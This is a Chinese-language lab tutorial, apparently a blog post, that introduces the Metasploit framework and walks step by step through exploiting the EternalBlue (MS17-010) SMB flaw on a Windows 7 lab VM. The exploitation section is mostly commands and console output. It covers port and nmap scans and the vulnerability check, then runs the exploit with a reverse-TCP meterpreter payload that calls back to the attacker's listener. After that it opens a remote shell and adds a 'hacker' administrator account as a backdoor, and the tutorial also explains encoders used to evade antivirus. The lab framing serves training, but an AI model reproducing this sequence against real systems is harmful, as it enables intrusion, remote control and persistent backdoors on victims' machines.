目录
1 MSF框架
1.1 MSF简介
- Metasploit框架(Metasploit Framework, MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。
- Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、 Web 、 CLI )。推荐使用控制台接口,通过控制台接口,你可以访问和使用所有Metasploit的插件,例如Payload、利用模块、 Post模块等。 Metasploit还有第三方程序的接口,例如Nmap、SQLMap 等,可以直接在控制台接口里使用,要访问该界面。
1.2 MSF五大模块类型
- Auxiliaries(辅助模块) 该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。
- Exploit(漏洞利用模块) 漏洞利用是指由渗透测试者利用 一个系统、应用或者服务中的安全漏洞进行的攻击行为 。流行的渗透攻击技术包括缓冲区溢出、 Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码 。
- Payload(攻击载荷模块) 攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在Metasploit框架中可以自由地选择、传送和植入 。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等 。
- Post(后期渗透模块) 该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。
- Encoders(编码工具模块) 该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、 IDS及类似的安全软件检测出来。
1.3 渗透攻击步骤
使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦察并发动攻击,大致的步骤如下所示。
- 扫描目标机系统,寻找可用漏洞。
- 选择并配置一个漏洞利用模块。
- 选择并配置一个攻击载荷模块。
- 选择一个编码技术,用来绕过杀毒软件的查杀 。
- 渗透攻击。
1.4 小结
“理论联系实际”是最好的学习方法,我们已经大概了解了 MSF渗透攻击的基础知识,下面进行一次简单的渗透实验来熟悉整个过程。
2 实验简介
2.1 永恒之蓝简介
- 背景: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
- 原理: 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
2.2 实验环境
- 靶机1:win7系统,IP地址为192.168.1.7。
- 靶机2:winxp系统,IP地址为192.168.1.9。
- 攻击者:kali系统(自带MSF框架)。
- 保证两者可以ping通。
2.3 实验目的
- 了解MSF的功能及使用过程。
- 复现永恒之蓝漏洞的攻击过程。
3 实验前准备
3.1 MSF启动、退出、更新
msfconsole
:启动MSF框架。exit
:退出MSF框架。也可以使用快捷键Ctrl+\
。back
:退出到上一级。apt-get update
:同步 /etc/apt/sources.list 和 /etc/apt/sources.list.d 中列出的源的索引,这样才能获取到最新的软件包。 。apt-get upgrade
: 使用该命令前要先使用update。升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态 。apt-get dist-upgrade
:升级整个Linux 系统,例如从Kali Linux 1.0.1 升级到 Kali Linux 1.0.2(不仅能够升级所有己安装的软件包 ,而且会处理升级过程中可能出现的软件冲突 。 某些情况下,它的部分升级过程需要人工参与)。- 上述的升级是比较全面且彻底的,但是要花费较多时间,建议在空闲时间使用,如果急需使用MSF又需要更新,建议采用单独升级的方式,先使用
apt update
再使用apt install metasploit-framework
。
3.2 MSF启动与更新实操
- 进入kali虚拟机,打开终端,输入
msfconsole
,进入MSF框架。执行过程如下,可以看到当前版本为6.1.14。
┌──(root💀kali)-[~]
└─# msfconsole=====================================================================================================+--------------------------------+==============================================| Session one died of dysentery. |==============================================+--------------------------------+=========================================================================================================
Press ENTER to size up the situation
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to continue=[ metasploit v6.1.14-dev ]
+ -- --=[2180 exploits - 1155 auxiliary - 399 post ]
+ -- --=[592 payloads - 45 encoders - 10 nops ]
+ -- --=[9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
- 输入命令
exit
退出MSF框架,来进行框架升级。 - 使用MSF之前,最好将其更新,以获取更多漏洞模块的支持。先使用
apt update
,再使用apt install metasploit-framework
。 - 再次输入命令
msfconsole
,查询更新后版本,执行过程如下。可以看到版本已更新到6.1.30,响应EXP等利用模块均增加了。
┌──(root💀kali)-[~]
└─# msfconsole=[ metasploit v6.1.30-dev ]
+ -- --=[2200 exploits - 1165 auxiliary - 395 post ]
+ -- --=[596 payloads - 45 encoders - 11 nops ]
+ -- --=[9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
4 主机扫描
扫描和收集信息是渗透测试中的第一步,其主要目标是尽可能多地发现有关目标机器的信息。获取的信息越多,渗透的概率就越大。该步骤的主要关注点是目标机器IP地址、可用服务、开放端口等。
4.1 使用辅助模块进行端口扫描
- 辅助模块是MSF的内置模块,首先利用
search portscan
命令查询一下有哪些可用的端口扫描模块,执行过程如下。 msf6 > search portscan
Matching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 >
- 在上述结果中,可以看到有8个可用的端口扫描模块,此处以tcp端口扫描模块为例进行扫描。输入命令
use auxiliary/scanner/portscan/tcp
进入对应模块(看>号前面的内容就知道自己所处模块位置),再输入show options
查询对应模块需要使用的参数。
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp)> show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10yes The number of concurrent ports to check per host
DELAY 0yes The delay between connections, per thread, in milliseconds
JITTER 0yes The delay jitter factor (maximum value by which to +/- DELAY)in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS 1yes The number of concurrent threads (max one per host)
TIMEOUT 1000yes The socket connect timeoutin milliseconds
msf6 auxiliary(scanner/portscan/tcp)>
- 在上述参数中,Required列,被标记为yes的参数必须包含实际的值,其中,除了RHOSTS外,其余参数均有默认值。THREADS设置扫描线程数量,默认为1,数量越高扫描越快。使用
set
命令设置某个参数值,可以使用unset
命令取消某个参数值的设置,设置完毕后使用run
命令执行模块,可以看到扫描结果如下,445端口存在可能利用的永恒之蓝漏洞。
msf6 auxiliary(scanner/portscan/tcp)>set RHOSTS 192.168.1.7
RHOSTS =>192.168.1.7
msf6 auxiliary(scanner/portscan/tcp)>set THREADS 16
THREADS =>16
msf6 auxiliary(scanner/portscan/tcp)> run
[+]192.168.1.7: - 192.168.1.7:135 - TCP OPEN
[+]192.168.1.7: - 192.168.1.7:139 - TCP OPEN
[+]192.168.1.7: - 192.168.1.7:445 - TCP OPEN
[+]192.168.1.7: - 192.168.1.7:5357 - TCP OPEN
[*]192.168.1.7: - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp)>
- 其实还有两条可选命令:
setg
命令和unsetg
命令 。二者用于在msfconsole中设置或者取消设置全局性的参数值,从而避免重复输入相同的值。
4.2 使用辅助模块进行服务扫描
- 在扫描目标机器上运行的服务时,有多种基于服务的扫描技术可供选择,例如VNC 、FTP 、SMB等,只需执行特定类型的扫描就可以发现服务。
- 使用命令
search scanner
可以发现大量的扫描模块,约有600多个,建议读者多尝试不同的辅助扫描模块,了解其用法。 - 使用
search scanner/smb
搜索与SMB服务相关的模块,搜索结果如下。使用的步骤与使用端口扫描模块时的基本相同,就不再演示了。
msf6 > search scanner/smb
Matching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
2 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
3 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
4 auxiliary/scanner/smb/smb_enumusers_domain normal No SMB Domain User Enumeration
5 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration
6 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
7 auxiliary/scanner/smb/smb_lookupsid normal No SMB SID User Enumeration (LookupSid)8 auxiliary/scanner/smb/pipe_auditor normal No SMB Session Pipe Auditor
9 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor
10 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration
11 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)12 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
13 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
14 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
4.3 使用 Nmap 扫描
- 在Metasploit中同样可以使用Nmap扫描,它不仅可以用来确定目标网络上计算机的存活状态,而且可以扫描计算机的操作系统、开放端口、服务等。熟练掌握Nmap的用法可以极大地提高个人的渗透测试技术。
- 在MSF框架中可以直接使用Nmap,输入命令
nmap -A 192.168.1.7
对靶机进行全面扫描,过程如下,可以看到445端口开启着,可能存在利用永恒之蓝漏洞。
msf6 > nmap -A 192.168.1.7
[*] exec: nmap -A 192.168.1.7
Starting Nmap 7.92( https://nmap.org ) at 2022-03-27 00:52 EDT
Nmap scan report for192.168.1.7 (192.168.1.7)
Host is up (0.00074s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP)5357/tcp open http Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:F2:1D:C2 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: DU-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|2.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2h39m58s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7600(Windows 7 Professional 6.1)| OS CPE: cpe:/o:microsoft:windows_7::-:professional
| Computer name: du-PC
| NetBIOS computer name: DU-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-27T12:53:38+08:00
| smb2-time:
| date: 2022-03-27T04:53:38
|_ start_date: 2022-03-26T15:18:54
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)|_nbstat: NetBIOS name: DU-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f2:1d:c2 (VMware)
TRACEROUTE
HOP RTT ADDRESS
10.74 ms 192.168.1.7 (192.168.1.7)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1host up) scanned in67.55 seconds
msf6 >
5 漏洞探测及利用
5.1 漏洞探测
- 在上述信息收集中,我们发现445端口开启,代表着目标靶机运行者SMB服务,这给我们提供了下一步分析了利用的方向。本节内容主要围绕永恒之蓝漏洞展开,因此使用命令
search sm17_010
查询与永恒之蓝相关的可利用模块,发现公有4个模块,辅助模块和利用模块各两个。
msf6 > search ms17_010
Matching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
- 端口开启不代表就存在永恒之蓝漏洞,因此我们还需要借助更具体的扫描模块来检验是否存在永恒之蓝漏洞,使用命令
use auxiliary/scanner/smb/smb_ms17_010
进入永恒之蓝漏洞扫描模块,输入参数options
查看所需参数。
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010)> options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check
ts/named_pipes.txt
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
-Metasploit
RPORT 445yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1yes The number of concurrent threads (max one per host)
- 在参数查询结果中,可以看到必填项中有RHOSTS还未设置信息,使用
set
命令设置参数后使用run
命令运行该模块。在运行结果的第一行中,Host is likely VULNERABLE to MS17-010!表示主机可能会受到ms17-010漏洞的伤害,也就是存在该漏洞。
msf6 auxiliary(scanner/smb/smb_ms17_010)>set RHOSTS 192.168.1.7
RHOSTS =>192.168.1.7
msf6 auxiliary(scanner/smb/smb_ms17_010)> run
[+]192.168.1.7:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)[*]192.168.1.7:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
5.2 漏洞利用
- 到此,我们从发现445端口开启,到验证永恒之蓝漏洞的存在,下一步就是漏洞利用,在前面我们已经搜索到永恒之蓝的两个漏洞利用模块,此处使用第一个进行测试。使用命令
use exploit/windows/smb/ms17_010_eternalblue
进入该模块,并输入命令options
查看所需参数。
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue)> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Win dows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH trueyes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET trueyes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.128 yes The listen address (an interface may be specified)
LPORT 4444yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
- 在参数查询结果中,可以看到必填项中有RHOSTS还未设置信息,使用
set
命令设置参数后使用run
命令运行该模块。可以看到漏洞已经利用成功,接下去就可以设置用户及其他留后门的手段了。
msf6 exploit(windows/smb/ms17_010_eternalblue)>set RHOSTS 192.168.1.7
RHOSTS =>192.168.1.7
msf6 exploit(windows/smb/ms17_010_eternalblue)> run
[*] Started reverse TCP handler on 192.168.1.128:4444
[*]192.168.1.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+]192.168.1.7:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)[*]192.168.1.7:445 - Scanned 1 of 1 hosts (100% complete)[+]192.168.1.7:445 - The target is vulnerable.
[*]192.168.1.7:445 - Connecting to target for exploitation.
[+]192.168.1.7:445 - Connection established for exploitation.
[+]192.168.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.7:445 - CORE raw buffer dump (27 bytes)[*]192.168.1.7:445 - 0x00000000 5769 6e 64 6f 77732037205072 6f 666573 Windows 7 Profes
[*]192.168.1.7:445 - 0x00000010 7369 6f 6e 61 6c 2037363030 sional 7600[+]192.168.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.7:445 - Trying exploit with 12 Groom Allocations.
[*]192.168.1.7:445 - Sending all but last fragment of exploit packet
[*]192.168.1.7:445 - Starting non-paged pool grooming
[+]192.168.1.7:445 - Sending SMBv2 buffers
[+]192.168.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.7:445 - Sending final SMBv2 buffers.
[*]192.168.1.7:445 - Sending last fragment of exploit packet![*]192.168.1.7:445 - Receiving response from exploit packet
[+]192.168.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*]192.168.1.7:445 - Sending egg to corrupted connection.
[*]192.168.1.7:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.1.7
[*] Meterpreter session 1 opened (192.168.1.128:4444 ->192.168.1.7:49165 ) at 2022-03-27 01:46:05 -0400
[+]192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+]192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+]192.168.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
- GetShell。输入命令shell来让靶机反弹shell到当前窗口。GetShell成功。
meterpreter > shell
Process 2684 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c)2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
- 创建用户并提权为管理员。
C:\Windows\system32>net user hacker 123456 /add
net user hacker 123456 /add
�����ɹ����ɡ�
C:\Windows\system32>net localgroup /add administrators hacker
net localgroup /add administrators hacker
�����ɹ����ɡ�
C:\Windows\system32>
- 验证:在win7的终端,输
入net user
查询用户列表,可以看到hacker用户已经在其中。
5.3 小结
至此,已经完成了对该漏洞的检验与利用。
6 总结
- 了解MSF框架的使用方法。
- 了解永恒之蓝漏洞。
参考文献
- 《“永恒之蓝”复刻,史上最详细的渗透原理讲解》复现视频
- 《永恒之蓝漏洞原理及利用》复现文本
- 《永恒之蓝漏洞利用及攻击》
版权归原作者 Fighting_hawk 所有, 如有侵权,请联系我们删除。